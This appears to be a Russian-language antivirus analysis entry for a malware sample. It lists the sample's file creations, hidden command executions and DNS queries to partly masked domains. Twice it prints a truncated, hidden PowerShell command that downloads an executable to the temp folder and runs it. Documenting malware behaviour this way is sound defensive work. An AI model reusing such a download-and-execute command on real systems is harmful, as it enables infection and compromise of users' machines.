Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $lnk как %temp%\qdsyj.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function dwn([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\qdsyj.exe'');Start-Process ''%TMP%\qdsyj.exe'';}try{dwn(''http://ds##bgd.com...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1186418.cvr
- %TEMP%\jmyvumx.bat
Сетевая активность
UDP
- DNS ASK ds##bgd.com
- DNS ASK ho###wskz.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function dwn([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\qdsyj.exe'');Start-Process ''%TMP%\qdsyj.exe'';}try{dwn(''http://ds##bgd.com...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Jmyvumx.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Jmyvumx.bat" "
